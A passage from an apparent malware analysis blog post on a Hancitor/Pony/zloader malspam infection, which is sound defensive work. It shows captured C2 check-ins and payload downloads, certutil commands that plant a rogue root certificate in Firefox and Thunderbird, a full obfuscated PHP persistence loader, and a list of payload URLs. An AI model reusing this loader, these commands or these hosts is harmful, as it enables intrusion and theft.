binary\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\n\r\n...\t..>.b..%v.......%.I.<.].9%\r\n#.d.....g..y.....W..g.....t....'...T..Y<0EpG\/......:...I.......".?P.\tYX#..f.....I.P.f....?U.J....O.y...G...<j..z.&.@HA..*<B ..=.&.S..O...Q....\r\n..o.P.n.W....s.U..K\r\n..>.v.......uY.......fw._...N...c.'...+6......A{&...........^.O...:6^.:\\.........~|I(.).6.<.O.ow.....i..|j.?;..Ur..w=.......M.p....+..T.9. 9.|.{..,_.......s\/.S.t;.?...].5......Y+.]p....a...;...[d_.w...-a_.U=.O\r\n..o......67... .sZ.I}..a..j......q.....D.8....x.D.5H......Z.r.[j....M.}...'i!...&nq.......m<.s..>...................&.D.}.%......V....l.....D.........E'iXG.|.b.....tW..n.....YN....g.@s.....:..\\.P..G\r\n.......N.O...E....Z......w>^....T..#..d.$.Y...\/.Y2l...Qi7...A......<....+#...y.B..6@...^G.E...t'.....!O..p.'b!.W%}..2[..9..9.\/.m..6...x5~.\r\n.*..t....W.....zm..#X[..s..J.Rt".......w6...m!....;W.(n:[.......8..E.....\t_....(....A_...$..!Ijl..Jf.'m.O9....hr%.\/7s.....W....&3...\/..Lo.}..iQ....c.....5>H.|...tR.[...3...v......`.$T....E.Uv8J".Y.........U.m..1..:A%.z@...,...~!..wDM.+...)N;..\r\n.`),...l....nN.^...9.G.A.@......'....?P.._..V}..h.$f...\tG....5r..G....g.j.}R5.K....`U...F.].u.*...Z.)g.... C.E{t....9...q?Taoip..dZJ.......{....Vy@.J...I..W.......';R.Te..l.*..l,.#c...!@4..#..8Id+..L...z....&..#...E...M.....Z...N.6......b.0-90y...4.?..t.C. 2.....zN.J...x..K... ..>......B]..'..,...C..\\?T.2.Y......."......c..zy...<....... ....*.....u..f.s;.0.WR.hz.J......\r\n{5W.p4...U.V...:.=..<...' ...4(.1.D#...y...}.!..x....c.])....x..2..6;..E...B..J.......@.....W..M.;N.4.J<.e..^.......n.I+........1..GS......J.7...\\.....r.@...K...\\.....|L....~..@..,o....$.!y...V..<.t..k...V.4E...Q.\\....7E.......{eb..U\r\n.3.F...}|..s.m.U.....kl...y..t.DEX.t3B...8.'..T\r\n%eD....G..1....Jd.u...X.%T..&....$....t....<....z.3~.....~K....."..._....R.....b....\r\n......=j...K..v..5.&....R"..s.Yk9..G...B.....5...b...I...p.........MF...TP..xK.^. ..}.D..-6..?=o....m......&."......re..m..,\r\nn....K.....3....([NA7........0.1.}.R..D...y....CWm.....z......4.T.&s[.....i3.d:V..c?.......v.s1..g.......n...[!........d.....+wC..p.t.G.g..9.:@.....,98....Q..)..v..............`vX..k...+.....Gk j-.\\.a.{.3$.|.....f...i...b.z...R\t.....Z6.8.I.3{..C.....8...z..r...(^..yOA.{%x] z....-v......"'J..{MG%.......K5....t..S-.A"r.9.y..{Z8.J.:...GH.5..O.).l..(.....n...G.w.R+..h..=U..KxGaMfB..@..."%...G..y.!.^.\t...Zzd....j..e).|.m.|e$........h!D.g.O..s.\/u^......a.u&..k.y...P|\r\n...S....Z.=.............>...Oq&...3S.m......\r\n...I...D.4.UJ.O.P@OZ...Dc.....m....+r.oYo..!\/..;."2_.w.......xV....T\/g.....h...T..{..g..8~...V._...t.-......_..,.e\r\n..[.v.!...8....Q....]h.....q....Ga...`..j...q.....,....7...lJ\\W..J.......5.\t..Y..\/{...4..^a.U.}....C............).1.7...-.....(.BF.."tt..3n.ec.A..*k..s1..d.L.\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Wed, 25 Jan 2017 15:57:12 GMT\r\nContent-Type: text\/html\r\nConnection: close\r\nX-Powered-By: PHP\/5.4.45\r\n\r\n..d!t..kf...w02.J...\r\n\r\n-----\r\n\r\nPOST \/ls5\/forum.php HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko\r\nHost: hedthowtorspar.com\r\nContent-Length: 110\r\nCache-Control: no-cache\r\n\r\nGUID=9259187252584972296&BUILD=2501&INFO=OPTIMUS @ OPTIMUS\\Administrator&IP=162.216.46.149&TYPE=1&WIN=6.1(x64)HTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Wed, 25 Jan 2017 15:59:15 GMT\r\nContent-Type: text\/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP\/5.4.45\r\n\r\nc\r\nCQJXARRABw==\r\n0<\/pre>\n
We also see some GET requests to the domain sy-nitron[.]pl.<\/p>\n
\r\nGET \/wp-content\/themes\/twentyfifteen\/pm1 HTTP\/1.1\r\nAccept: *\/*\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko\r\nHost: sy-nitron.pl\r\nCache-Control: no-cache\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 25 Jan 2017 15:57:03 GMT\r\nServer: Apache\/2\r\nLast-Modified: Wed, 25 Jan 2017 12:56:37 GMT\r\nETag: "5e60f5c-b4fb-546eac3573e11"\r\nAccept-Ranges: bytes\r\nContent-Length: 46331\r\nConnection: close\r\nContent-Type: text\/plain\r\n\r\n...Tm]y.....7.y.....i]I.....meT....ltm....<REST OF PACKET>\r\n\r\n-----\r\n\r\nGET \/wp-content\/themes\/twentyfifteen\/2501 HTTP\/1.1\r\nAccept: *\/*\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko\r\nHost: sy-nitron.pl\r\nCache-Control: no-cache\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 25 Jan 2017 15:57:13 GMT\r\nServer: Apache\/2\r\nLast-Modified: Wed, 25 Jan 2017 12:56:52 GMT\r\nETag: "5e60f5f-2c8fe-546eac4414ff0"\r\nAccept-Ranges: bytes\r\nContent-Length: 182526\r\nConnection: close\r\nContent-Type: text\/plain\r\n\r\n...T.,@?..X.#,C?...T.,.....T.,@?..UT.,@?...T.,@?...T.,@?...T.,@?...T.,.?..E..,.>...,.t@?...T.,.?...U.,@...<REST OF PACKET><\/pre>\n
Lastly we see callback activity to the site rowatterding[.]ru via some POST requests and then a call to the site checkip.dyndns.com to get my IP address.<\/p>\n
\r\nPOST \/bdk\/gate.php HTTP\/1.1\r\nAccept: *\/*\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\/6.0)\r\nHost: rowatterding.ru\r\nContent-Length: 908\r\nConnection: Close\r\n\r\n.%....2.\t...\\M..Y..=K..rB\\h..2..v....(b.....G....0..c........).D...%>.n...S.....+.dO.]z...c2.&..HEt'N.#a1...q..H.c2]|-.....S..VkXs...[...5\r\n..20...84.....?.E..3z..y.m.P..&.'-84.......-..Yo".`#....}...P..#....`h...A......l...\\......u8.5..H.....A).?....|S.F.Q.........;{...# ..c.(......X..,. .. B......Z..4\r\nG.Lh...L..\t..F...`..Q.sHh..$...'.\r\n.x.K..C..!E..~>\r\n..(....q.Sr..D...F.A........9C..%.*..H........^g.c...{t.M.>sb3.@M.....'...7..e.)....@....D..@.[2..4.....\\&....Y..:....d....K....7.u.o.t.}._..I.....D....Z.\/....%.r..A.Hu...K.....j8..V..;...J......5e.....{..8..H.3n.....+.....H........;.+......=.Ur....6.H...m.IE..;Oe3~..4....6(.?..7..?......l`..a'm%...(.L...mX%.As..j`...v...%.p....v.=)..>q..b.\t$~..`.....n...1S..F....4.VF......jl.r...I.<....K.,.>...'.j..~...tf^..m...w..w.+H*..[..>l.'.nP2iZH-..Bl;Bd...X..y...$V..w.O?.fEnF\r\n..].M..T.%..^...V.N.%....W..4j' .....i.d..2.V.v....1..2..M.,-..U..[f.`..c\\d....E..\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Wed, 25 Jan 2017 15:57:15 GMT\r\nContent-Type: application\/octet-stream\r\nContent-Length: 7186892\r\nConnection: close\r\nX-Powered-By: PHP\/5.4.45\r\nContent-Description: File Transfer\r\nContent-Disposition: attachment; filename=tv.dat\r\nContent-Transfer-Encoding: binary\r\nExpires: 0\r\nCache-Control: must-revalidate\r\nPragma: public\r\n\r\n<].#..U7q.v....?rE^.i..S...)..L..rO...y!.........d...TxY..-G|.w.\\^$..).......<REST OF PACKET>\r\n\r\n-----\r\n\r\nPOST \/bdk\/gate.php HTTP\/1.1\r\nAccept: *\/*\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\/6.0)\r\nHost: rowatterding.ru\r\nContent-Length: 1060\r\nConnection: Close\r\n\r\n.'.L.v....@.P....A.h.I0.....O.I..=..\r\n..R.&...,yqW.SV.Y=L...>M.Y. aC........1.wX'....|..<yg....:...........u%.T..f.....i.......p....!T..u..'..YzdM.....t....f..hY.&..(.<";r..Si....^?.....R....#.#h.....u..h.e.>..=..&..~.t...(.Q>.;`^7.7n....Y..A...y.L....Cr1.N.Cz...0Ed. .m.K...hvY.......w.L."..D>.D......3....y..8..%.^.!..-....z..N..w.>d.....F.....D.;..)."3V2..j\r\n........=|.....1P.....m.9.i.+..w...OK.{A...N.X...`g.Z.'....WT...b...>?.gB.E.w...X.....Wz.....%@....d.@..;.y..%..Mf...T.........\r\n.."K..2w...0......e..<....o...v...........`.o.)Xo....\r\n.s.....g}.....t.......d5]".,..9...C......Fb...A..5.a..H..x[J.&D...~"k%....e[...\t.pd..u..~..j:..=9[...e.uH.S..ZS.w.8...7..P.1...#...U'...[..MD<..lk..G\r\n.....kN.......B..{x.....J....:.O..I..1.)*66.........!XR]P|...m....Z.A.........j..\r\n....k...0..>......0.....2...\\..+.H?.C....V4f..K2$...........&v..I}?.$..`.......#.@............dJ`Y[R(....4.Et.g.h.<;.x.....(.^+689.....Y...2..m..q0...F`..N...;..F....J{?..<...H".Y..G.........#..7..DN.........a.-B.....i...<....QR8........S..'.....:.f...\r\nz.s..I...uKA....h.\\..\r\n..T..*.p6q.\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Wed, 25 Jan 2017 15:57:39 GMT\r\nContent-Type: text\/html\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nX-Powered-By: PHP\/5.4.45\r\n\r\ne35\r\n...x4B..'..m...Np8..N..xHVb..=.......@..z;...q...q.."...t....h........vT.OM.....%#js.ar...VZ.2..9MT +.Cdks....A^.|H..m....Ln....vzf......D.u......jmvv.Yc.i.X:.....D..........]P.F...lRP{.A..a.@..\r\nT!U..4\t.S.}.G..Fj.......'U....r......Jz .M .....\/ZP.g...z........q82.>:....3.."..Q`86.O...f=...+.2.....u4.B.h...6...7.[.q..V5\tly....L..k}.\r\n.'-!..^..!......DN...&...Y.^:.i.\t<REST OF PACKET>\r\n\r\n-----\r\n\r\nGET \/ HTTP\/1.1\r\nAccept: *\/*\r\nConnection: Close\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: checkip.dyndns.org\r\nCache-Control: no-cache\r\n\r\nHTTP\/1.1 200 OK\r\nContent-Type: text\/html\r\nServer: DynDNS-CheckIP\/1.0\r\nConnection: close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nContent-Length: 106\r\n\r\n<html><head><title>Current IP Check<\/title><\/head><body>Current IP Address: 162.216.46.149<\/body><\/html><\/pre>\n
With more POST requests once the IP address has been obtained.<\/p>\n
\r\nPOST \/bdk\/gate.php HTTP\/1.1\r\nAccept: *\/*\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: rowatterding.ru\r\nContent-Length: 677\r\nConnection: Close\r\n\r\n.........?...G]..(v..E<.....M.K."K.ec%\/..`k....Qw.sv.y.l..'.m.y..Ac..3.......Wx.....\\...YG..<..5....."....U.7t..F.....I.92....P.....z..h..:.QwT....=y...\t.Q.KN.....>.\r\nJ.7).v[=....VY..........4..@.....z..w.~w[.q\\..k...t.D(....=.;`b...g....b...|X.I.U+x.X+..i..F.wN..z.......<..........a}AK...o.y...K.$b.v=.@.,.....NM#....f4..+5...V01..H.>...}<..r[\r\n.).....%j....dpK.AxR.Y.ap.....j..3..Q...9\r\nT.....Fhf.ez...8ABF.K...bH.IM......I.U.DQ2........l..]K.!$.5..."....u.QL.....).........b7...V......S...R..F.C...;Z..^.5......D*6b..0........#.#Xq....i.x...>..1....\r\n\r\n....:.?.u$.V.d.........*6.w....%.yZ...K0.$..-.....:......1........YE.....<....@...e..P.D.,..V....M........H...S.?........Il+p\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Wed, 25 Jan 2017 15:58:23 GMT\r\nContent-Type: text\/html\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nX-Powered-By: PHP\/5.4.45\r\n\r\n5ae\r\n....]820...".wQ..DOu\r\n..5..\/L.y.U..a..!..>.C.6*......B...7......e...'-.Z?&'e......(P{.Kl...P......rC...........B}.W.iY..(.R..........\r\n.....I..)\r\nWD]....c..i.........)..........0(.:..."].q.R.;6.....BG<...{.....6...4.......(.....M......,_\r\n3$....0.@.k.*..yU....x...C.........j..3...p|9.\\E..5r...;.).....*r...)..[:..]sCR.;Gv.8.r0....M..&m...q`e.NH..?......L\r\n^..p.....}=.'.DT.'.f......7 ....).S=.!G.\\~.CG.....z......p...$...l.RA,.....JU.F.......p....E..Hy........K.......n..R.'.."A..F..R.lZ...C.TP.?.k^j.u.-.,.}...Y..CH.M.....][..Q..\t....<..\tN'7.D._S....2m...9.......-l`K.PX..X+noM=.<.R..\tG...:vu....A.......so.......'%...cf..x4..Bt.#.'.\r\n9.l.~....O\r\n.............\r\njg=..l.b..hl...r..=....l..O(G...^dr..8.........o6.Y......}.p.3V.v...{...KfW.\/..R..s..?H.}...z.U....(.OS.!..<.:5....h}..e."....x.1.&S.P....Q...q1EP.IV....1J..K~3u.D.p'.P.....c........'6.u..a......Ic.Q.}....j...-.t.h .......>.Nq.z.!....L.......O1j.^.~j...3Z.;....l....r...~m.P.....&.....gI.Xo.C..y.t..#........F.A..+..m..Qo.C....nd.Q..5.}.$gB..*...>^@+E..M.$..Mt..p.kp.>.e.7!-.A.)\t..M.h.\t..(.s.....N:.....v9Sp.....O.<U..r..-8k`..K......f.4\t9d#.4.X..a.e.]4........|..k..\/\/J\r\n.9.3..B(mXM'y.....t..w...T.b...g|<. g{?....\\<.A.C._.....)....f......&.<...f..D....K1.........d..a...U.\tb..zY..>a..E.....o.A.O..W....2..{..r...^.~.....o..t.......o..`.#5.g..>......,.....\\.p....v.L.{.P0..3=.U..m.u8w..R.+....Rf..(Q......ze~.....6...ee.....04.8......Kr....JM.6-..k..C......q...*.....c... ..?S.....A..S....B6.P#<...\r\n0<\/pre>\n
There is one POST though that is interesting since the response from the server to the infected VM looks like a binary.<\/p>\n
\r\nPOST \/bdk\/gate.php HTTP\/1.1\r\nAccept: *\/*\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: rowatterding.ru\r\nContent-Length: 298\r\nConnection: Close\r\n\r\na.q..2..]..>)...&E.`.J3.....O.I.,i.2.......y ..Mk.oj.e.p..;.q.e..]...\/.....\r\n.Kd.....@...E[.. ..).....>....I.+h..Z.....U.%.....L.....u..e..7.^x[....\\.y.......~.@`,~...M*F..6.ay...r.x..'oj.%....uI....AoW.}...\/.\r\ng..0......Ni.tX.._...$..E.,..\/.J3di.^.....^...{?...L(sl1..)..\r\n.Il...V......WF.=|........~\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Wed, 25 Jan 2017 15:58:24 GMT\r\nContent-Type: application\/octet-stream\r\nContent-Length: 699\r\nConnection: close\r\nX-Powered-By: PHP\/5.4.45\r\nContent-Description: File Transfer\r\nContent-Disposition: attachment; filename=tv.dat\r\nContent-Transfer-Encoding: binary\r\nExpires: 0\r\nCache-Control: must-revalidate\r\nPragma: public\r\n\r\n.l..x.$^...*...B--...#Z.....".$.t......L..E[eC.&......r...*.....S'%..|......<\/pre>\n
Looking at this from a high level system perspective and not just from the network; the Word document starts a SVCHOST process, which in turn kicks off a “CMD.exe \/K” command in thread 2272. The SVCHOST process also creates a file called “BNCF61.tmp” located in the “C:\\Users\\%username%\\AppData\\Local\\Temp\\” folder and then proceeds to start this as a new process as well. The “BNCF61.tmp” file then starts “explorer.exe,” which in turn starts up the “MSIEXEC.exe” process. At this point numerous files have been written to the file system in the “C:\\Users\\%username%\\AppData\\Local\\Temp\\” folder and to the “C:\\Users\\%username%\\AppData\\Roaming” folder (see the artifacts section above). One thing to note here – most of the files written to the the filesystem are written by the MSIEXEC.exe process or the certutil.exe process with a handful of files being written by the “SearchProtocolHost.exe” process. <\/p>\n
Also, as seen in the Process Monitor logs the MSIEXEC.exe process starts up a “certutil” process:<\/p>\n
\r\nDate: 1\/25\/2017 9:57:35 AM\r\nThread: 2008\r\nPID:\t2088\r\nCommand line:\t"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\certutil.exe" -A -n "ybarwio" -t "C,C,C" -i "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\akpeydzais.crt" -d "C:\\Users\\Administrator\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\cnpfjmzq.default"<\/pre>\n
which adds this to the Firefox Certificate Manager under “Authorities.”<\/p>\n
\"\"<\/a><\/p>\n
and also looks like it adds to Thunderbird as well:<\/p>\n
\r\nDate: 1\/25\/2017 9:57:37 AM\r\nThread: 2008\r\nPID:\t2768\r\nCommand line:\t"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\certutil.exe" -A -n "meekmowey" -t "C,C,C" -i "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\akpeydzais.crt" -d "C:\\Users\\Administrator\\AppData\\Roaming\\Thunderbird\\Profiles\\3zzscv0r.default"<\/pre>\n
\"\"<\/a><\/p>\n
I also saw the msiexec.exe process writing a registry key to “HKCU\\Software\\Microsoft\\Raezr” while the process creates and modifies keys under the “HKCU\\Software\\Microsoft\\Raezr\\Uggiygiru” key. I have added that registry hive to the artifacts folder. Also, it looks as if persistence is obtained by writing a file called “php.lnk” in the StartUp folder. This file points to the php.exe file in the “Qufyzo” folder which then reads the oqluy.php file. The obfuscated code for that file is below:<\/p>\n
\r\n<?php $GLOBALS['2112334483']=Array('file_' .'g' .'e' .'t_cont' .'en' .'ts','file' .'_p' .'ut_contents','exec','array_' .'fill','curl_mu' .'l' .'ti_r' .'em' .'ove_handl' .'e','unlink','st' .'rpos','array' .'_revers' .'e','strlen','' .'im' .'agecreate','strlen','ch' .'r','ord','str' .'pos','c' .'u' .'r' .'l_mult' .'i_' .'in' .'fo_' .'r' .'ead','c' .'hr','mt_' .'rand'); ?><?php function _1988818774($lcafoi){$wzfwbx=Array("\\x6f\\xc9\\x3c\\xcf\\x5e\\x91\\x13\\xe8\\x72\\xb4\\x06\\xf1\\x46\\x98\\x0a\\xee\\x44\\x85\\x05\\xea\\x5e\\x8a\\x39\\xde\\x42\\x89\\x22\\xc1\\x47\\x9b\\x3b\\xf3\\x5b\\x9a\\x05\\xcb\\x5b\\x9b\\x35\\xea\\x5e\\x92\\x1c\\xc3\\x6b\\x88\\x0e\\xc9\\x5d\\xd1\\x18\\xc7\\x55","\\x6f\\xc9\\x3c\\xcf\\x5e\\x91\\x13\\xe8\\x72\\xb4\\x06\\xf1\\x46\\x98\\x0a\\xee\\x44\\x85\\x05\\xea\\x5e\\x8a\\x39\\xde\\x42\\x89\\x22\\xc1\\x47\\x9b\\x3b\\xf3\\x5b\\x9a\\x05\\xcb\\x5b\\x9b\\x35\\xea\\x5e\\x92\\x1c\\xc3\\x6b\\x88\\x0e\\xc9\\x5d\\xd1\\x18\\xc7\\x55\\x2e\\x08\\xdf\\x5e",'ab','mobbctpncubwqbbw','qfz','','p','bpsopktsibfnjrm','cepz');return $wzfwbx[$lcafoi];} ?><?php $xknhjqu=-round(0+45723178.4+45723178.4+45723178.4+45723178.4+45723178.4);$yljzott=_1988818774(0);$hiktbbe=_1988818774(1);$yljzott=jqnwmyo($yljzott,$xknhjqu);$hiktbbe=jqnwmyo($hiktbbe,$xknhjqu);$oubwoyp=_1988818774(2);$vxmksnu=$GLOBALS['2112334483'][0]($yljzott);if($vxmksnu){$emdilrw=jqnwmyo($vxmksnu,$xknhjqu);$GLOBALS['2112334483'][1]($hiktbbe,$emdilrw);$GLOBALS['2112334483'][2]($hiktbbe);if((round(0+898+898+898)+round(0+771.66666666667+771.66666666667+771.66666666667))>round(0+538.8+538.8+538.8+538.8+538.8)|| $GLOBALS['2112334483'][3]($xknhjqu));else{$GLOBALS['2112334483'][4]($vxmksnu,$hiktbbe,$qiujhbx);}while(!$GLOBALS['2112334483'][5]($hiktbbe))Sleep(round(0+0.5+0.5));if($GLOBALS['2112334483'][6](_1988818774(3),_1988818774(4))!==false)$GLOBALS['2112334483'][7]($dcbcwxb,$amiuzub,$dcbcwxb,$amiuzub);}function tytuykg($bxhnecg,$dcbcwxb){$kzptguq=$dcbcwxb&round(0+15.5+15.5);return($bxhnecg << $kzptguq)|(($bxhnecg >>(round(0+16+16)-$kzptguq))&((round(0+0.5+0.5)<<(round(0+15.5+15.5)&$kzptguq))-round(0+0.25+0.25+0.25+0.25)));}function jqnwmyo($amiuzub,$xknhjqu){$zdubkat=_1988818774(5);if((round(0+215.5+215.5)^round(0+86.2+86.2+86.2+86.2+86.2))&& $GLOBALS['2112334483'][8]($kzptguq,$yljzott,$bxhnecg))$GLOBALS['2112334483'][9]($belxvol,$xknhjqu,$kzptguq);$belxvol=$GLOBALS['2112334483'][10]($amiuzub);$mtukbjc=_1988818774(6);for($qiujhbx=round(0);$qiujhbx<$belxvol;++$qiujhbx){$dvvevxt=$GLOBALS['2112334483'][11]($GLOBALS['2112334483'][12]($amiuzub{$qiujhbx})^($xknhjqu&round(0+127.5+127.5)));if($GLOBALS['2112334483'][13](_1988818774(7),_1988818774(8))!==false)$GLOBALS['2112334483'][14]($zdubkat);$zdubkat .= $dvvevxt;(round(0+1071.3333333333+1071.3333333333+1071.3333333333)-round(0+1071.3333333333+1071.3333333333+1071.3333333333)+round(0+1216.5+1216.5+1216.5+1216.5)-round(0+973.2+973.2+973.2+973.2+973.2))?$GLOBALS['2112334483'][15]($bxhnecg,$bxhnecg,$qiujhbx):$GLOBALS['2112334483'][16](round(0+152),round(0+803.5+803.5+803.5+803.5));$xknhjqu=tytuykg($xknhjqu,round(0+4+4));++$xknhjqu;$vmdhslf=round(0+640.4+640.4+640.4+640.4+640.4);}return $zdubkat;$rekqtac=round(0+833.33333333333+833.33333333333+833.33333333333);} ?><\/pre>\n
I was not sure what exactly this PHP was doing, so I rebooted the VM to see what processes spun up and what processes tried to call back out from the VM. It looks like it calls the “explorer.exe” process which then spins up the “msiexec.exe” process which proceeds to sit there and listen for connections.<\/p>\n
\"\"<\/a><\/p>\n
As seen in the image below, SVCHOST was talking to the IP address of 95.169.190.104 over HTTP prior to the reboot.<\/p>\n
\"\"<\/a><\/p>\n
Lastly, before rebooting the VM, I did run strings2 on the SVCHOST.exe process shown above. Looking through that output, I did notice some other URLs that were not used in this infection. Those URLs are as follows:<\/p>\n
\r\nhxxp:\/\/hedthowtorspar.com\/klu\/forum.php\r\nhxxp:\/\/fortmamuchco.ru\/klu\/forum.php\r\nhxxp:\/\/fortrittotfor.ru\/klu\/forum.php\r\nhxxp:\/\/sy-nitron[.]pl\/wp-content\/themes\/twentyfifteen\/pm1\r\nhxxp:\/\/acdclubs[.]com\/wp-content\/plugins\/quick-setup\/pm1\r\nhxxp:\/\/cwmeza[.]com\/wp-content\/plugins\/video-silo-builder-1[.]6[.]3\/pm1\r\nhxxp:\/\/drums-outlet[.]com\/wp-content\/plugins\/wordbay\/pm1\r\nhxxp:\/\/gojokai-trouble[.]com\/wp-content\/plugins\/contact-form-7\/modules\/pm1\r\nhxxp:\/\/hareruyalife[.]com\/wp-content\/plugins\/feedwordpress\/pm1\r\nhxxp:\/\/sy-nitron[.]pl\/wp-content\/themes\/twentyfifteen\/2501\r\nhxxp:\/\/acdclubs[.]com\/wp-content\/plugins\/quick-setup\/2501\r\nhxxp:\/\/cwmeza[.]com\/wp-content\/plugins\/video-silo-builder-1[.]6[.]3\/2501\r\nhxxp:\/\/drums-outlet[.]com\/wp-content\/plugins\/wordbay\/2501\r\nhxxp:\/\/gojokai-trouble[.]com\/wp-content\/plugins\/contact-form-7\/modules\/2501\r\nhxxp:\/\/hareruyalife[.]com\/wp-content\/plugins\/feedwordpress\/2501<\/pre>\n
There was a whole lot more in the strings2 output that looked like it was reading the system details from what applications were installed to what the Windows firewall was setup as.<\/p>\n","protected":false},"excerpt":{"rendered":"
In this post I was able to investigate a Hancitor\/Pony\/zloader malspam message. Looking around for some more information about this infection, I was able to find the following links: – Brad’s SANS ISC Blog post talking about this exact malspam: http:\/\/isc.sans.edu\/forums\/diary\/HancitorPonyVawtrak+malspam\/21919\/ – Hybrid Analysis’ report for another example of this malspam: http:\/\/www.hybrid-analysis.com\/sample\/827873b4d0b846e9bc372bfdac135ec7431baa809366633df4eac15235b9736c?environmentId=100 – Looking at the Virustotal comments, I saw Techhelplist had commented about this and then looked for the Tweet: http:\/\/twitter.com\/Techhelplistcom\/status\/824283429181259776 As usual, all the artifacts, the PCAP, and ProcMon log can be found in my Github repo for this investigation here. Update After posting this blog entry out…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-697","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/697","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=697"}],"version-history":[{"count":8,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/697\/revisions"}],"predecessor-version":[{"id":712,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/697\/revisions\/712"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=697"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=697"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=697"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}